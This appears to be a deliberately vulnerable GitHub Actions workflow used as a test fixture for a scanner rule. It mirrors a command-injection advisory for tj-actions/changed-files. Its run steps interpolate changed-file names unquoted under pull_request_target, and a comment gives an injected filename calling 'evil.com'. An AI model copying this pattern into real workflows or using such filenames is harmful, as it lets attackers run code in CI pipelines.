# GHSA-mcph-m25j-8j63: Command injection via filenames with special characters in tj-actions/changed-files
# Advisory: https://github.com/advisories/GHSA-mcph-m25j-8j63
# Vulnerability Type: Command Injection (CWE-78)
# Expected Rule: CodeInjectionCriticalRule
# Severity: High

name: Vulnerable - Command Injection via Changed Files

on:
  pull_request_target:
    types: [opened, synchronize]

jobs:
  changed-files-vulnerable:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      pull-requests: read
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 0

      - name: Get changed files (vulnerable pattern from tj-actions/changed-files@v41)
        id: changed-files
        run: |
          # Simulate getting changed files
          ALL_CHANGED_FILES="src/main.go src/test.go"
          echo "all_changed_files=$ALL_CHANGED_FILES" >> "$GITHUB_OUTPUT"

      - name: Process files (vulnerable)
        run: |
          # Vulnerable: Direct iteration over output without proper quoting
          # An attacker can inject commands via filename like: file.go$(curl http://evil.com)
          for file in ${{ steps.changed-files.outputs.all_changed_files }}; do
            echo "Linting: $file"
            # Vulnerable to command injection through filename
          done

      - name: Count changed files (vulnerable)
        run: |
          # Vulnerable: Using changed files in arithmetic without sanitization
          FILE_COUNT=$(echo "${{ steps.changed-files.outputs.all_changed_files }}" | wc -w)
          echo "Changed $FILE_COUNT files"
